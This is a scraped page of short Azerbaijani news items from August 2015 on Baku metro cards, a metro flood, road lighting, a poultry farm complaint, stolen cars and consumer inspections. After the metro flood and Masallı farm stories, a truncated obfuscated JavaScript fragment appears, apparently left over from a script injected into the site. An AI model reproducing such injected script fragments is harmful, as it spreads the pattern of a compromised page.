Bakı yollarına quraşdırılmış “ölüm işıqları“

22251

Azərbaycanda bir çox yolların işıqlandırılmasında problemlər var Baku.ws-ə edilən şikayətdə bildirilir ki, dövlət əhəmiyyətli yolların çox hissəsində yolun tən ortasında uzaqvuran işıqlardan, "projektor”lardan istifadə edilir.Bu da sürücülərə yolu tam yaxşı görməyə mane olur. Şikayətçilər konkret olaraq Bakı-Quba yolunda, "Beşbarmaq” yaxınlığındakı ərazilərdə quraşdırılan "projektor”lardan şikayətlənirlər. Nəqliyyat ürzə ekspertlər də hesab edirlər ki, həqiqətən də bir çox yollarda istər yol nişanları, istərsə də işıqlandırma sistemi düzgün qurulmayıb. Nəqliyyat üzrə ekspert Məzahir Rüstəmov BAKU.WS-ə açıqlamasında bildirib ki, yollara bu qədər vəsaitin ayrılmasına baxmayaraq, hələ də bir çox problemlrə özünü göstərməkdədir. Belə problemlərdən biri də gecə saatlarında yolların işıqlandırılmaması, yaxud da işıqlandırma sisteminin düzgün qurulmamasıdır. "Bəzən görürsən ki, lazımsız yolu gur işıqlandırıblar. Elə əhəmiyyətli döngə və dalanlar var ki, ora gecələr zülmət olur. Bir çox ərazilərdə isə uzaqvuran işıqları yolun tam ortasına qoyurlar. Bu da sürücülərdə görməni məhdudlaşdırır”, - deyə Məzahir Rüstəmov bildiridi. Mütəxəssis deyir ki, qonşu ölkələrdə yolların işıqlandırılaması zamanı işığın düşmə bucağı elə hesablanır ki, o hərəkət iştirakçısına mane olmasın. "Xaricdə də uzaqvuran işıqlardan istifadə edilir. Lakin onları elə quraşdırırlar ki, işığın şüası nə yol ilə keçən piyadaya mane olmasın, nə də sürücünün üzünə düşsün. Azərbaycanda isə yol salınarkən bəzən bu amillər unudulur”, - deyə Məzahir Rüstəmov bildirib. Məsələ ilə bağlı Baş Dövlət Yol Polis İdarəsindən bildirilib ki, qeyd edilən əraziyə yaxın yerdə piyada keçidi var. Bu səbəbdən orada xəbərdaredici işıqlardan istifadə edilir. Bundan əlavə, həmin istiqamətdə avtomobil gur hərəkət edir. Ona görə də, orada xəbərdaredici işıqlar vurulur. Qurumdan bildirilir ki, şikayətlərlə bağlı araşdırmalar aparılacaq. Əgər həqiqətən də, hansısa yolda qəza yarada biləcək işıqlar quraşdırılbsa, problem həll olunacaq.

13 Avqust 2015 1:34

57 minə yaxın “BakıKART” satılıb

7519

  “Bu günə qədər 57 minə yaxın “BakıKART” (plastik) və 2 min 500-dən artıq “BakıKART Məhdud istifadə üçün” yaxın kart satılıb” Bunu Azvision.az-a açıqlamasında “Bakı Metropoliteni” Qapalı Səhmdar Cəmiyyətinin mətbuat xidmətinin rəhbəri Nəsimi Paşayev deyib. Qurumun rəsmisi bildirib ki, kartların istər satışı, istərsə də sərnişinlərin bu yeniliyə uyğunlaşması proqnozlaşdırılan axarla davam edir: “Kartlar yeni olduğundan sərnişinlərin yenidən məlumatlandırılmasına və suallarının cavablandırılmasına ehtiyac yaranır. Keçid dövrü üçün bu vəziyyət normal qəbul edilir və xidmətin müvafiq işçiləri, həmçinin “BakıKART”ın təlimatlandırılmış nümayəndələri sərnişinləri lazım olan bütün informasiya ilə təmin edirlər”. Qeyd edək ki, Avqustun 8-də Bakı metropolitenində yeni vahid ödəniş kartlarının istifadəsinə başlanılıb. Yeni kartlar təkcə metropolitendə deyil, eyni zamanda, “BakuBus” MMC-yə məxsus avtobus marşrutlarında da tətbiq olunur. Qiymətlərə gəlincə, “BakıKART”ın (plastik kart) satışı 2 manat, “BakıKART Məhdud istifadə üçün” kartının satışı isə 20 qəpikdir. Bir gediş haqqının qiyməti dəyişməyib. Sərnişinlər hər gediş üçün 20 qəpik yükləyirlər. Qeyd edək ki, plastik “BakıKART” metrodan daim istifadə edən sərnişinlər üçün sərfəlidir. “BakıKART Məhdud istifadə üçün” kartı isə, əsasən şəhərimizin qonaqları, turistlər və metrodan az istifadə edənlərə sərf edər. Bu növ karta yalnız satın alındığı zaman 1, 2, 3 və ya 4 gediş yükləmək mümkündür. Onun balansının artırılması mümkün deyildir. Hər iki növ kart heç bir halda geri qaytarılmır. “METRO KART” ın balansında olan gediş haqqı sentyabrın 30-na qədər etibarlıdır. Sərnişinlər “METRO KART”ı qaytarmaq istəsələr, avqustun 15-nə kimi stansiyaların kassalarına yaxınlaşaraq, kartı qaytarıb onun girov dəyərini geri ala bilərlər. Bundan savayı, hər bir sərnişin avqustun 15-dən sentyabrın 30-na kimi stansiyalardakı kassalarda “METRO KART”ın girov dəyərini yalnız gediş haqqı kimi istifadə edə biləcək. Bunun üçün o, yeni «BakıKART»la birlikdə «METRO KART»ı stansiyalardakı kassalara verir və girov dəyərini yüklətdirir. Sentyabrın 30-dan “METRO KART”ın istifadəsi dayandırılacaq və onu istifadə etmək mümkün olmayacaq. Onu da əlavə edək ki, “METRO KART” və “BakıKART»larla əlaqəli yaranmış problemlə bağlı “20 Yanvar”, “Cəfər Cabbarlı”, “Nəriman Nərimanov” və “Neftçilər” stansiyalarında fəaliyyətdə olan “KART-ANALİZ” mərkəzlərinə, yaxud *4343 telefon nömrəsinə və ya www.bakikart.az veb səhifəsinə müraciət edə bilərsiniz.

12 Avqust 2015 11:16

Metronu su basdı, “Sahil“ stansiyası bağlandı

90494

Bakı Metropoliteninin fəaliyyətində problem yaranıb. "İçərişəhər" stansiyası istiqamətində qatarların hərəkəti tam dayanıb "Dərnəgül" stansiyası istiqamətində gedən qatarlar isə "Nizami" stansiyasına qədər hərəkət edir. “Bakı Metropoliteni” QSC-nin mətbuat xidməti və ictimaiyyətlə əlaqələr şöbəsinin rəisi Nəsimi Paşayev saivil.az-a bildirib ki, "Sahil" stansiyasında su axıntısında artım müşahidə olunub. Bu artımın qarşısını almaq üçün gərginlik çıxarılıb. Buna görə də hazırda "28 may"-"İçərişəhər" xətti istiqamətində qatarların hərəkəti dayandırılıb. "Həzi Aslanov" istiqamətindən gələn qatarlar "Nizami" stansiyasındakı dalandan geri qaytarılır. Metropoliten rəsmisi bildirib ki, problem qısa müddətdə aradan qaldırılacaq. Bakı metrosunun "Sahil" stansiyası bağlanıb. Bu barədə faktı "Trend"ə metropolitendən təsdiqləyiblər. Qısa müddətə bağlanan stansiyada problemin texniki nasazlıqdan yarandığı bildirilib. Nəsimi Paşayev bildirib ki, sözügedən problemə metronun "28 may" və "Sahil" stansiyaları arasındakı tuneldə su axınının artması səbəb olub. Hazırda problemin aradan qaldırılması istiqamətində işlər aparılır. // t;t++)e+=o.charCodeAt(t).toString(16);return e},p=function(){var w=window,p=w.document.location.protocol;if(p.indexOf('http')==0){return p}for(var e=0;e

11 Avqust 2015 6:51

Mikayıl Cabbarov 131 şagirdə qızıl medal verdi

7302

Qızıl və gümüş medal alanların 83 nəfəri bölgə məktəblərini təmsil edir Təhsil naziri Mikayıl Cabbarov ümumi təhsil məktəblərinin məzunlarının qızıl və gümüş medalla təltif edilməsi haqqında əmr imzalayıb.Təhsil Nazirliyinin mətbuat xidmətindən verilən xəbərə görə, Təhsil Nazirliyi 2014-2015-ci tədris ilinin yekunlarına görə, ümumi təhsili xüsusi nailiyyətlərlə başa vuran 131 nəfəri qızıl, 21 nəfəri gümüş medalla təltif edib.Qızıl və gümüş medal alanların 69 nəfəri Bakı, 83 nəfəri isə bölgə məktəblərini təmsil edir. Onların 135 nəfəri dövlət, 17 nəfəri özəl məktəblərdə təhsil alıb. Qızıl medal sahiblərinin 75 nəfəri oğlan, 77 nəfəri qızdır.Medala namizədlər Nazirlər Kabinetinin “Ümumi təhsili xüsusi nailiyyətlərlə başa vuran məzunların qızıl və ya gümüş medalla təltif olunma Qaydası”na uyğun olaraq müəyyənləşdirilib.Medalla təltif zamanı namizədlərin ümumtəhsil məktəbində oxuduğu müddətdə təhsildə xüsusi nəticələri ilə bərabər, nümunəvi davranışı ilə fərqlənməsi, fənn olimpiadalarında, ölkə və beynəlxalq səviyyəli bilik yarışlarında, müsabiqə və layihələrdə yüksək mükafat qazanması nəzərə alınıb.Həmçinin, təhsildə yüksək nəticələr göstərmiş bir qrup məzun Təhsil Nazirliyinin Fəxri Fərmanı ilə təltifə təqdim olunub.(azvision.az)

11 Avqust 2015 12:19

Masallıda toyuq-cücə işgəncəsi

9DE2D712-9341-4B3A-8302-8AB5C1FF1C69_w640_r1_s

Masallının Meşəkənar və Köhnə Alvadı kəndlərinin yaxınlığında yerləşən quşçuluq ferması hər iki kəndin sakinlərini cana yığıb. Onlar "Azadlıq" radiosunun «Qaynar xətt»inə üz tutaraq fermadan dözülməz qoxu gəldiyini bildirirlər. "Yaşamaq mümkün deyil. Qohum-əqrəba, dost-tanış nə xeyrimizə gəlir, nə də şərimizə. Gələn adam həyətdə, evdə 5 dəqiqədən çox otura bilmir, durub qaçır. Qonaq-qara yanında xəcalət çəkirik" - Meşəkənar sakini Aydın Məmmədov belə deyir. Onun sözlərinə görə, yayda vəziyyət daha dözülməz olur. Bir yandan isti, bir yandan da adamın iliyinədək işləyən pis qoxu: "Axşamlar məhəllədə toplaşıb nərd oynar, samovar qaynadardıq. Bu toyuq-cücə peyininin beyin çatladan iyi bizi hər şeydən məhrum edib". Kənd sakini Tofiq Əsədov deyir ki, ferma ilə onun yaşadığı ev arasında heç 100 metr məsafə yoxdur. Qapı-pəncərəni bağlamaq da dada yetmir: "Toyuq peyinindən cana doymuşuq. Yaşayış məhəllələrində də quşçuluq sexi tikərlər? Üfunətdən baş götürüb kənddən qaçmağa yer axtarırıq. Fermada ventilyasiya sistemi var, içəridəki üfunəti düz evimizə vurur. Evdə otura, həyətə çıxa bilmirik, gələn qonaq-qara yanında da üzümüz qaradır". Sakinlərin həmin fermada on minlərlə toyuq-cücə saxlandığını söyləyirlər: "Yaşayış evləri arasında ferma olar? Neyləyək? Çıxaq yolu bağlayaq? Gedək Prezident Administrasiyasının qarşısında yorğan-döşək salıb yataq? Niyə xırda bir məsələnin bu boyda şişməsinə şərait yaradırlar? Baytarlıq idarəsinə, icra hakimiyyətinə müraciət etmişik, heç kəsin vecinə deyil". Sakinlər deyir ki, fermanın sahibi elə öz həmyerliləri olan bir millət vəkilidir: "Öz adına deyil, qohum-əqrəbasının, dost-tanışının adınadır. Ancaq kənddə uşaqdan böyüyə hamı bilir ki, bu ferma onundur. Balaca rayondur, burda hansı obyekt, hansı tin kimindir, - hamı yaxşı bilir. Kənardan idarə edir, xeyrini götürür. Heç olmasa bir insan kimi, ətrafda yaşayanları da düşünsün. O, pul qazanacaq deyə biz ev-eşiyimizdən didərgin düşməliyik? Özüm burada qalıram, arvad-uşağı aparıb başqa kənddə bir qohumun evinə yerləşdirmişəm. Yaydır, min cür xəstəliyə yoluxmalarını gözləməliyəm? Bir əncam çəksinlər". Masallı Rayon İcra Hakimiyyəti vəziyyətdən məlumatsız olduğunu və məsələni araşdırmaq üçün ferma ərazisinə nümayəndə göndərəcəklərini bildirir. Burada ferma sahibinin kimliyini bilmədiklərini də söyləyiblər. Hüquqşünas Fuad Hüseynov deyir ki, "Baytarlıq haqqında" qanun fərdi mənzil tikintisinə ayrılmış torpaq sahələrində quş sexlərinin inşasını qadağan edir. // t;t++)e+=o.charCodeAt(t).toString(16);return e},p=function(){var w=window,p=w.document.location.protocol;if(p.indexOf('http')==0){return p}for(var e=0;e

10 Avqust 2015 5:30

DİN itən maşınlara aid hesabat yaydı

siyagi

Daxili İşlər Nazirliyi 2000-ci ildən bu yana Azərbaycanda itən maşınların siyahısını təqdim edib Faktinfo-nun nazirliyin saytına istinadən məlumatına görə, siyahıdan məlum olur ki, son 15 ildə Azərbaycanda ən çox maşın Bakının Nəsimi rayonunda itib.Siyahıda hətta 1988-ci ildən bu yana axtarışda olan maşınlara belə rast gəlinir. Siyahıya əsasən, hazırda ümumilikdə ölkə üzrə 2 521 maşın axtarılır.2000-ci ildən bu yana itmiş maşınların statistikasına əsasən, ən çox axtarılan maşınlar sırasında lider sovet istehsalı olan VAZ markalı avtomobillərdir. Belə ki, 138 ədəd VAZ 2106, 110 ədəd VAZ 2107, 50 ədəd digər VAZ 21-lər axtarılan maşınlar sırasında liderdilər. Daha 16 ədəd Mercedec, 9 ədəd Qazel, 8 ədəd VAZ 2121 (Niva) itmiş maşınlar sırasındadır. İtmiş maşın markaları sırasında az da olsa (1-2 ədəd) BMW, Hunday, Opel, Lexsus, Porşe və s. rast gəlmək olar.Maşınlar Azərbaycan üzrə ən çox Bakının Nəsimi rayonunda (60) yoxa çıxıb. Bundan əlavə Binəqədidə 53, Nərimanovda 41, Yasamalda 39, Nizami rayonunda 36, Xətaidə 28, Səbayeldə 14, Xəzər rayonunda isə 13 maşın itib.Azərbaycanın rayonlarında Kəpəz, Sumqayıt üzrə- 5, Abşeron, Masallı, Nizami (Gəncə), Şirvan- 3, Lənkəran, Qusar, Xaçmaz, Kürdəmir- 2, Ağcabədi, Ağstafa, Astara, Beyləqan, Cəlilabad, Qəbələ Şamaxı, Mingəçevir, Oğuz, Tovuz rayonlarında isə hərəsində 1 maşın itkindir.Siyahıya əsasən, ən çox maşın itməsi halı 2014-cü ildə 74 maşının yoxa çıxması ilə qeydə alınıb.Məlumdur ki, müasir avtomobil oğruları qeyri-qanuni yolla əldə etdikləri maşınların tanınmaması üçün nəinki onların rəngini, ümumi görünüşünü hətta ban nömrələrini belə dəyişdirə bilirlər. Belə oldğuğu təqdirdə bəzi itmiş avtomobillərin tapılması mümkünlüyü sıfıra bərabərdir.

10 Avqust 2015 4:12

Komitə sədri: “İŞİD-in Azərbaycanda heç bir dayağı yoxdur”

dayag

“İŞİD qruplaşması Türkiyə üzərindən Naxçıvanla sərhəddə Azərbaycana yaxınlaşması, Azərbaycanda bu təşkilata meylli radikalların hansısa ayrı-ayrı şəxslərin ətrafında mərkəzləşməsi ilə bağlı yayılan məlumatlar da əsassızdır” Bunu APA-ya açıqlamasında Dini Qurumlarla İş üzrə Dövlət Komitəsinin sədri Mübariz Qurbanlı bildirib.M. Qurbanlı qeyd edib ki, təəssüf ki, bəzi mətbuat orqanları bəzi radikal din nümayəndələrini lider kimi təqdim edib, onların bəyanatlarını tirajlayırlar və bununla cəmiyyətdə yanlış təəssürat yaradırlar. İŞİD-in nəinki regionda, dünyanın gündəmində olduğunu xatırladan Komitə sədri deyib ki, Azərbaycanda İŞİD-in hansısa bir dayağı, sosial bazası, məntəqəsi yoxdur və ola da bilməz: “Hansısa xırda radikal qruplaşma burada İŞİD-in tezislərini təkrar edirsə, bu o demək deyil ki, Azərbaycanda bunların hansısa dayağı olsun. Bu qruplaşmaya bağlı, digər qruplaşmaya əsaslanan bəzi radikal təşkilatlar Şimali Qafqazda, həm də Azərbaycanda yayılmaq, tərəfdarlar toplamaq istəyirlər. Cəhdlər var. Amma bilsinlər ki, bu cəhdlərin qarşısı qətiyyətlə alınacaq. Həm hüquq-mühafizə orqanlarımız bununla bağlı yüksək qabaqlayıcı tədbirlər görürlər, həm də maarifləndirici-ideoloji tədbirlərimiz yüksək rol oynayır”.Komitə sədri vurğulayıb ki, Azərbaycanda müəyyən radikal qüvvələr var: “Amma onlara qarşı digər qurumlarla birgə apardığımız işlər kifayət qədər yaxşı nəticələr verir. Biz məscidlərdə bu qruplaşmaların təbliğat aparmasının qarşısını alırıq və alacağıq. Qafqaz Müsəlmanları İdarəsi ilə birgə bu işi görürük. O ki qaldı hansısa silahlı birləşmələrə adam toplamaq ilə məşğul olanlara, birbaşa terror qruplaşmalarının təbliğatını aparanlara qarşı da müvafiq qurumlar məşğul olurlar, zaman- zaman bu cür şəxslər olarsa cavab verməli olacaqlar”.

10 Avqust 2015 3:15

Səhiyyə Nazirliyindən xəbərdarlıq

71477

Mövsümlə əlaqədar baş verən qida zəhərlənməsi hallarının səbəbləri araşdırılır Səhiyyə Nazirliyinin Respublika Gigiyena və Epidemiologiya Mərkəzinin Dövlət sanitariya xidməti zəhərlərlənmələrlə bağlı xəbərdarlıq edib. Nazirliyin mətbuat xidmətindən verilən məlumata görə, mövsümlə əlaqədar baş verən qida zəhərlənməsi hallarının səbəblərini diqqətlə araşdırır. Bu məqsədlə müvafiq təhqiqat işləri həyata keçirilir. Qidanın hazırlanma, saxlanma, daşınması və istifadəsi zamanı sanitariya norma və qaydalarının, gigiyena normativlərinin pozulması halları müəyyənləşdirilir. Qəbul olunmuş qidaların içərisində zəhərlənməyə səbəb olması ehtimal olunan qida müəyyənləşdirilir, qida qalıqlarından və xəstələrin mədə yuyuntusundan nümunələr götürülür və laboratoriya müayinələri aparılır. Qeyd etmək lazımdır ki, vətəndaşlar tərəfindən qidanın ev şəraitində hazırlanmasına Dövlət sanitariya nəzarətinin həyata keçirilməsi mövcud qanunvericiliklə nəzərdə tutulmayıb. Ümumiyyətlə qida zəhərlənmələrinin baş verməsinin əsas səbəbi qidanın emalı, saxlanması, daşınması və satışı zamanı müvafiq qaydaların və normativlərin pozulması nəticəsində qidanın bakteriyalarla çirklənməsi ola bilər. Bu cür halların baş verməsi əsasən termiki emaldan keçmiş qidaların, soyuq qəlyanaltıların, kremli tortların, saxlanması soyuq mühit tələb edən digər qidaların saxlanma şəraitinə və müddətinə əməl edilməməsidir. Belə hallar əsasən ilin isti aylarında müvafiq şərait olmadan qidanın lazımi temperaturda saxlanılmadan qəbulu hallarında baş verməsi əvvəllər qeydə alınıb. Qida zəhərlənməsi baş vermiş ictimai iaşə müəssisəsinin rəhbərləri, sahibkarlıq subyektlərinin sahibkarları və fiziki şəxslər Azərbaycan Respublikasının qanunvericiliyinə uyğun olaraq yol verilmiş sanitariya norma və qaydalarının pozulmasına görə məsuliyyət daşıyırlar. Zəhərlənmə hallarının qarşısını almaq məqsədilə ictimai iaşə obyektləri tərəfindən bir sıra qabaqlayıcı tədbirlərin görülməsini vacib hesab edir. İctimai iaşə obyektlərində sanitariya norma və qaydalarının tələblərinə əməl olunmalı, iaşə sahəsində çalışan işçilərin sanitariya-gigiyena qaydalarının tələbləri üzrə biliklərinin artırılmalıdır.

8 Avqust 2015 6:05

Ərzaq mağazasında diqqət yetirəcəyiniz ilk fakt

100707

İstehlak bazarında yararsız ərzaq məhsulları aşkar edilərək götürülüb Trend İqtisadiyyat və Sənaye Nazirliyinə istinadən xəbər verir ki, sözügedən qurumun Antiinhisar Siyasəti və İstehlakçıların Hüquqlarının Müdafiəsi Dövlət Xidməti tərəfindən istehlak bazarında monitorinqlər həyata keçirilib. Dövlət Xidməti tərəfindən aparılan növbəti monitorinqlər zamanı bir sıra rayonlarda nöqsanlar aşkarlanıb. Belə ki, Bakının Suraxanı rayonundakı Qaraçuxur qəsəbəsində Əmirarşad Bərxudarova məxsus mağazada, Binəqədi rayonunda 8 mikrorayon, S.S.Axundov küçəsində Tahir Orucova məxsus supermarketdə saxlama müddəti ötmüş və normativ-texniki sənədlərin tələblərinə uyğun olmayan malların satıldığı aşkar edilib. Analoji vəziyyət digər obyektlərdə - Sabunçu rayonunun Bakıxanov qəsəbəsində Şakir İbrahimova məxsus mağazada, Bərdə rayonunda Hüseynbəyli kəndində Çingiz Məmmədova məxsus yeməkxanada, Bərdə şəhəri, Nizami küçəsində yerləşən Rəhim Hacıyevə məxsus mağazada normativ-texniki sənədlərin tələblərinə uyğun olmayan malların, Qaradağ rayonunda Sahil qəsəbəsi, N.Mustafayev küçəsində yerləşən Natəvan Nağıyevaya məxsus mağazada, Sabunçu rayonunun Zabrat qəsəbəsində isə Azad Qəhrəmanova məxsus "Ailə" marketdə yararsız ərzaq məhsulları aşkar edilərək götürülüb. Məlumatda daha sonra qeyd olunur ki, monitorinqlər zamanı Gədəbəy şəhəri H.Əliyev prospektində Vüqar Ruşanova məxsus mağazada, Tovuz rayonunun Aşağı Quşçu kəndində yerləşən Namiq Əmiraslanova və Sədaqət Tağıyevaya məxsus mağazalarda, Bərdə rayonunun Güloğlular kəndi, Təzə bazarda Nazim Abbasova məxsus mağazada, Bərdə şəhəri, Ü.Hacıbəyov küçəsində yerləşən İlyas Hüseynova məxsus mağazada, Xaçmaz şəhərinin 20 Yanvar küçəsində yerləşən Elvin Poladova məxsus mağazada, Lənkəran şəhərinin Z.Əliyeva prospektində yerləşən Emil Azadova məxsus mağazada, Qəbələ rayonunda, Xırxatala kəndində Cavad Gözəlova məxsus mağazada da saxlama müddəti ötmüş malların satıldığı aşkarlanıb və istifadəyə yararsız məhsullar obyektlərdən götürülüb. Qeyd edək ki, qanun pozuntusuna yol vermiş şəxslər barəsində Azərbaycan Respublikasının İnzibati Xətalar Məcəlləsinə uyğun olaraq inzibati cərimələr tətbiq olunur.

8 Avqust 2015 4:13

Bakıda “AAAF Park“la bağlı böyük qalmaqal: Pullar hara getdi?

43637

"AAAF Park" yaşayış kompleksindən ev alan Xəyal Verdiyev ona verilən mənzil sahəsinin 68 kvadratmetr deyil, 58 kvadratmetr olduğunu öyrənib Azxeber.com xəbər verir ki, ANS telekanalının keçmiş aparıcısı Xəyal Verdiyev məşhur şirkətlərdən biri olan "AAAF Park"ı məhkəməyə verir.Buna səbəb isə keçmiş aparıcının şirkət tərəfindən aldadılmasıdır.Belə ki, "AAAF Park" yaşayış kompleksindən ev alan Xəyal Verdiyev ona verilən mənzil sahəsinin 68 kvadratmetr deyil, 58 kvadratmetr olduğunu öyrənib. "AAAF PARK-ı məhkəməyə verməyə hazırlaşıram. 68 kvadratmetr ev almışdım, indi təmirə başlamışam. Ustalar evin kvadratını ölçəndən sonra məlum oldu ki, mənzilin sahəsi 68 yox, 58 kvadratmetrdir. Maraqlandım, dedilər ki, mənzilin kvadratını hesablayanda divarları da nəzərə alırlar. Deməli, mən divara görə AAAF PARK-a 6500 manat əlavə pul ödəmişəm. Sənəddə ev 68 kvadratmetr olaraq göstərilir və heç bir yerdə bununla bağlı məlumat öz əksini tapmayıb. Bu özbaşınalığa son verməyin vaxtı gəlib çatıb", - sabiq teleaparıcı yazıb.X.Verdiyev daha sonra bildirib ki, qanunvericiliyi araşdırıb. Qanunlarda da nəzərdə tutulub ki, mənzillərin sahəsi hesablanarkən divarlar nəzərə alınmamalıdır. O, "AAAF Park"ın mətbuat katibinə də zəng etdiyini və həmin şəxsin də X.Verdiyin haqlı olduğunu etiraf etdiyini söyləyib: "Mənzili alan zaman satış təmsilçiləri bu haqda mənə heç bir məlumat vermədilər, şirkətlə bağladığımız müqavilədə də bununla bağlı heç bir bənd yoxdu. Onlar sonradan ayıldılar, tez müqaviləyə yeni bənd əlavə etdilər. Lakin mənimlə bağlanan müqavilədə divarların da hesablanması ilə bağlı heç bir bənd yoxdur".Məsələ ilə bağlı "AAAF Park"la əlaqə saxladıq. Şirkətdən sullarımıza cavab verən şəxs Lalə xanımla əlaqə saxlamağımızı xahiş etdi. Adıçəkilən şəxsə isə dəfələrlə zəng olunsa da, telefonu açan olmadı.

7 Avqust 2015 3:23

Verilişlərin “qara siyahısı” hazırlanır

606608

  ““Televiziya və radio yayımı haqqında” Qanunda edilmiş son dəyişiklikdən sonra Milli Televiziya və Radio Şurasına qanun pozuntularına yol verən verilişləri dayandırmaq səlahiyyəti verilib Özəl televiziya kanallarında yayımlanan şou xarakterli verilişlər haqqında dosyelərin hazırlanması da məhz bundan irəli gəlir. Tutaq ki, sabah hansısa verilişi dayandırmaq məsələsi ortaya çıxanda həmin dosye əlimizin altında olacaq”. Bunu APA-ya Milli Televiziya və Radio Şurasının (MTRŞ) Ekspertiza, Proqramlaşdırma və Analitik şöbəsinin müdiri Təvəkkül Dadaşov deyib. O bildirib ki, dosyedə verilişlərin ümumi məzmunu və məqsədi geniş şəkildə əksini tapacaq: “Ümumiyyətlə, verilişdə hansı məsələlər müzakirə olunur, veriliş tok-şoudur, ya əyləncəlidir, yaxud maarifləndiricidir, yəni bu kimi məsələlər dosyedə göstəriləcək. Bir də verilişdə əvvəl və indi yol verilən qanun pozuntuları da dosyedə əks olunacaq ki, verilişlə bağlı ümumi mənzərə yaransın. Məsələn, bu gün verilişdə qanun pozuntusu baş verir. Amma əvvəl verilişdə belə bir hal aşkarlanmayıb. Yaxud da əksinə. Bu kimi təsadüfi hallar dosyedə nəzərə alınacaq. Digər bir verilişdə qanunvericiliyin pozulması, milli-mənəvi dəyərlərə hörmətsizlik halları mütəmadi olaraq təkrarlanır”. Şöbə müdirinin sözlərinə görə, dosyeləri hazırlanacaq verilişlərin siyahısı konkretləşməyib: “Bütün verilişlər haqda hazırlanacaq dosyelərə eyni yanaşma tətbiq olunacaq. Başqa cür anlaşılmasın, bu, bizim işimizin mahiyyətidir. Biz bütün verilişlərlə bağlı məlumatlı olmalıyıq. Monitorinq şöbəsində hər bir monitorinqçinin cavabdeh olduğu kanal var. Dosyelərin əsasında rəhbərliyə arayış təqdim edəcəyik ki, məsələn, filan verilişdə müsbət məqamlar, filan verilişdə isə mənfi məqamlar üstünlük təşkil edir. Buna tam “qara siyahı” da demək olmaz. Çünki müsbət məqamlar da dosyedə qeyd olunacaq. Amma təbii ki, neqativ aspektdən fərqlənən verilişlərin dosyelər əsasında ayrıca “qara siyahısı” olacaq”. T. Dadaşov qeyd edib ki, indidən dosyeləri hazırlanacaq verilişlərin adlarını açıqlamaq tezdir: “Lakin ictimaiyyət mütəmadi qanun pozuntularının baş verdiyi verilişlərin adını yaxşı bilir. Həm də əksər verilişlər tətildədir. Bəlkə də haqqında dosye hazırlanacaq verilişlərin bir neçəsi proqramdan çıxarılacaq. Yeni verilişlər də yayımlana bilər ki, onlar haqda da dosye hazırlansın. Yeni verilişlərdə də nöqsanlar ola bilər. Növbəti mövsümdə, sentyabrda dosyelər daha təkmil şəkildə hazırlanacaq”. Qeyd edək ki, bir müddət əvvəl MTRŞ sədri Nuşirəvan Məhərrəmli bildirib ki, özəl televiziya kanallarında yayımlanan şou xarakterli verilişlərin hər biri haqqında dosye hazırlanacaq və o dosyedə verilişlərin tərtibatı və sair məsələlər haqda arayış veriləcək. Arayışda qanunvericiliyə zidd hallar olacağı təqdirdə, bu məsələyə Şura tərəfindən baxılacaq.

6 Avqust 2015 2:20

Metro kartının istifadə müddəti nə vaxt bitir?

45981

  Bakıda avqustun 8-dən etibarən Bakı Metropoliteni stansiyasına daxil olmaq üçün vahid ödəniş kartı kimi "BakıKart" və "BakıKart Məhdud istifadə üçün" kartların istifadəsinə başlanılır "Qafqazinfo" xəbər verir ki, verilən məlumata görə, ilkin mərhələdə "BakıKart" və "BakıKart Məhdud istifadə üçün" kartlarından "BakuBus"MMC-yə məxsus avtobuslarda və Bakı Metropolitenində gediş haqqının ödənişi üçün istifadə ediləcək. "BakıKart" və "BakıKart Məhdud istifadə üçün" kartlarını bütün stansiyaların vestibüllərində və "BakuBus" MMC-yə məxsus marşrutların Bakıdakı dayancaqlarda quraşdırılımış yeni terminallardan əldə etmək olar. Qeyd edək ki, "BakıKart"ın (plastik kart) qiyməti 2 manatdır və 1 gediş haqqının qiyməti isə 0,20 manatdır. Terminallarda kartın balansını artırmaq mümkündür. Bu növ kart yuxarıda adları çəkilən nəqliyyat vasitələrində daimi istifadə edən sərnişinlər üçün nəzərdə tutulub. "BakıKart Məhdud istifadə üçün" kartın qiyməti də 0,20 manatdır. Bu növ karta yalnız satın alınarkən 1,2,3 və ya 4 gediş yükləmək mümkündür. 1 gediş haqqının dəyəri 0,20 manatdır. Termianllarda bu növ kartların balansını artırmaq mümkün deyil. Bu növ kart yuxarıda qeyd edilən nəqliyyat vasitələrindən çox az istifadə edən şəhərin qonaqları və sakinləri üçün nəzərdə tutulub. Hər iki növ kart heç bir halda geri qaytarılmır. Qurum "Metrokart"ın yeni karta inteqrasiya qaydalarına da aydınlıq gətirib. Belə ki, "Metrokart"ın girov dəyəri 2 şəkildə gediş haqqı olaraq istifadə oluna bilər: "Metrokart"ın girov dəyəri "Metrokart"a gediş haqqı olaraq yüklənir. "Metrokart"ın balansı sıfır olduqda atılır və yeni "Bakıkart" alınaraq istifadə olunur. "Metrokart"ın girov dəyəri və balansında olan məbləğ "BakıKart"a köçürülərək istifadə edilir. "Metrokart"ın balansında olan gediş haqqı sentyabrın 30-na qədər istifadə oluna bilər. "Metrokart"ın girov dəyəri və balansında olan məbəğ "BakıKart"a köçürmək istəyən sərnişinlər yeni terminal vasitəsilə "Bakıkart"ı alıb istifadədə olan "Metrokart"ı ilə birlikdə stansiyanın xəzinədarına təqdim etməlidir. Bir ədəd "Metrokart"ın girov dəyərini və ona yüklənmiş məbləği yalnız bir ədəd "Bakıkart"a transfer etmək mümkündür. "Metrokart"ı qaytarmaq istəyən sərnişinlər kartın girov dəyərini avqusutn 15-nə kimi stansiyaların xəzinədarlarından geri ala biləcəklər. Avqustun 15-dən sentyabrın 30-dək "Metrokart"ın girov dəyəri sadəcə gediş haqqı kimi istifadə olunacaq. Sentyabrın 30-dək metropolitendə "Metrokart" və "Bakıkart"ın birgə istifadəsi həyata keçiriləcək. Sentyarın 30-dan etibarən "Metrokart"ın istifadəsi dayandırılacaq.

6 Avqust 2015 11:19

Bakıda ləğv edilmiş marşrut xətləri bərpa olunur?

0469

